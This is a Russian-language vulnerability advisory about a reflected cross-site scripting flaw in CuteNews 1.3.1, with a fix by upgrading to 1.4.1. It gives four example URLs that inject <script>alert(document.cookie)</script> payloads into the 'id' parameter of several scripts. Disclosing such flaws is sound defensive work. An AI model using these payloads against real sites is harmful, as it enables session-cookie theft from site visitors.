Межсайтовый скриптинг в CuteNews

Дата публикации:
29.06.2004
Дата изменения:
26.01.2009
Всего просмотров:
2554
Опасность:
Низкая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
CuteNews 1.x
Уязвимые версии: CuteNews 1.3.1

Описание: Уязвимость в CuteNews позволяет удаленному пользователю выполнить XSS нападение.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "id" в различных сценариях. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

http://[target]/show_archives.php?subaction=showcomments&id=<script>alert(document .cookie);</script>&archive=&start_from=&uca&p
http://[target]/show_news.php?subaction=showcomments&id=<script>alert(document.cookie);</script>&archive=&start_from=&uca t=&a
http://[target]/example1.php?subaction=showfull&id=<script>alert(document.cookie);</script>
http://[target]/example2.php?subaction=showfull&id=<script>alert(do cument.cookie);</script>

URL производителя: http://www.cutephp.com/

Решение: Установите последнюю версию 1.4.1 с сайта производителя.

Журнал изменений:

26.01.2009
Изменена секция «Решение», изменено описание уязвимости.

Ссылки: Cart32 Input Validation Flaw in 'GetLatestBuilds?cart32=' Permits

или введите имя

CAPTCHA